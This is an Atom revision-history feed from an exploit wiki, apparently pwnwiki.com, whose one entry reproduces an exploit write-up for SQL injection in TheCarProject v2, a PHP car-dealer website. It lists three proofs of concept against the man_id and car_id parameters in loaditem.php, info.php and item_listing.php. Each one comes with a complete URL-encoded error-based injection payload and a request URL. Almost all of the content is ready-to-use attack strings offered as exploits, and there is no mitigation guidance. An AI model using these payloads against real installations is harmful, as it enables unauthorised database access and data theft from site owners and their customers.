<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=TheCarProject_2_-_Multiple_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>TheCarProject 2 - Multiple SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=TheCarProject_2_-_Multiple_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=TheCarProject_2_-_Multiple_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T08:48:31Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=TheCarProject_2_-_Multiple_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=2035&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; =========================================================================================== # Exploit Title: TheCarProject v2 - 'man_id' SQL Inj. # Dork: N/A # D...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=TheCarProject_2_-_Multiple_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=2035&amp;oldid=prev"/>
		<updated>2021-05-02T04:59:15Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; =========================================================================================== # Exploit Title: TheCarProject v2 - &amp;#039;man_id&amp;#039; SQL Inj. # Dork: N/A # D...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
===========================================================================================&lt;br /&gt;
# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.&lt;br /&gt;
# Dork: N/A&lt;br /&gt;
# Date: 17-03-2019&lt;br /&gt;
# Exploit Author: Mehmet EMIROGLU&lt;br /&gt;
# Vendor Homepage: https://thecarproject.org/&lt;br /&gt;
# Software Link: https://sourceforge.net/projects/thecarproject/&lt;br /&gt;
# Version: v2&lt;br /&gt;
# Category: Webapps&lt;br /&gt;
# Tested on: Wamp64, Windows&lt;br /&gt;
# CVE: N/A&lt;br /&gt;
# Software Description: A fully Featured Auto vehicle, Auto Dealer php&lt;br /&gt;
sales web site software&lt;br /&gt;
  built on Bootstrap 3 it will present the best possible viewpoint for&lt;br /&gt;
your customers&lt;br /&gt;
  unlimited items, unlimited images per item. Totally driven from the&lt;br /&gt;
admin side of the site.&lt;br /&gt;
===========================================================================================&lt;br /&gt;
# POC - SQLi&lt;br /&gt;
# Parameters : man_id&lt;br /&gt;
# Attack Pattern :&lt;br /&gt;
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)&lt;br /&gt;
# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1&lt;br /&gt;
or 1=1 and (SELECT 1 and ROW(1,1)&amp;gt;(SELECT&lt;br /&gt;
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x&lt;br /&gt;
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)&lt;br /&gt;
===========================================================================================&lt;br /&gt;
###########################################################################################&lt;br /&gt;
===========================================================================================&lt;br /&gt;
# Exploit Title: TheCarProject v2 - 'car_id' SQL Inj.&lt;br /&gt;
# Dork: N/A&lt;br /&gt;
# Date: 17-03-2019&lt;br /&gt;
# Exploit Author: Mehmet EMIROGLU&lt;br /&gt;
# Vendor Homepage: https://thecarproject.org/&lt;br /&gt;
# Software Link: https://sourceforge.net/projects/thecarproject/&lt;br /&gt;
# Version: v2&lt;br /&gt;
# Category: Webapps&lt;br /&gt;
# Tested on: Wamp64, Windows&lt;br /&gt;
# CVE: N/A&lt;br /&gt;
# Software Description: A fully Featured Auto vehicle, Auto Dealer php&lt;br /&gt;
sales web site software&lt;br /&gt;
  built on Bootstrap 3 it will present the best possible viewpoint for&lt;br /&gt;
your customers&lt;br /&gt;
  unlimited items, unlimited images per item. Totally driven from the&lt;br /&gt;
admin side of the site.&lt;br /&gt;
===========================================================================================&lt;br /&gt;
# POC - SQLi&lt;br /&gt;
# Parameters : car_id&lt;br /&gt;
# Attack Pattern :&lt;br /&gt;
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)&lt;br /&gt;
# GET Method : http://localhost/TheCarProject/cp/info.php?man_id=3&amp;amp;car_id=-1&lt;br /&gt;
or 1=1 and (SELECT 1 and ROW(1,1)&amp;gt;(SELECT&lt;br /&gt;
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x&lt;br /&gt;
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)&lt;br /&gt;
===========================================================================================&lt;br /&gt;
###########################################################################################&lt;br /&gt;
===========================================================================================&lt;br /&gt;
# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.&lt;br /&gt;
# Dork: N/A&lt;br /&gt;
# Date: 17-03-2019&lt;br /&gt;
# Exploit Author: Mehmet EMIROGLU&lt;br /&gt;
# Vendor Homepage: https://thecarproject.org/&lt;br /&gt;
# Software Link: https://sourceforge.net/projects/thecarproject/&lt;br /&gt;
# Version: v2&lt;br /&gt;
# Category: Webapps&lt;br /&gt;
# Tested on: Wamp64, Windows&lt;br /&gt;
# CVE: N/A&lt;br /&gt;
# Software Description: A fully Featured Auto vehicle, Auto Dealer php&lt;br /&gt;
sales web site software&lt;br /&gt;
  built on Bootstrap 3 it will present the best possible viewpoint for&lt;br /&gt;
your customers&lt;br /&gt;
  unlimited items, unlimited images per item. Totally driven from the&lt;br /&gt;
admin side of the site.&lt;br /&gt;
===========================================================================================&lt;br /&gt;
# POC - SQLi&lt;br /&gt;
# Parameters : man_id&lt;br /&gt;
# Attack Pattern :&lt;br /&gt;
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)&lt;br /&gt;
# GET Method : http://localhost/TheCarProject/cp/item_listing.php?man_id=-1&lt;br /&gt;
or 1=1 and (SELECT 1 and ROW(1,1)&amp;gt;(SELECT&lt;br /&gt;
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x&lt;br /&gt;
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)&lt;br /&gt;
===========================================================================================&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>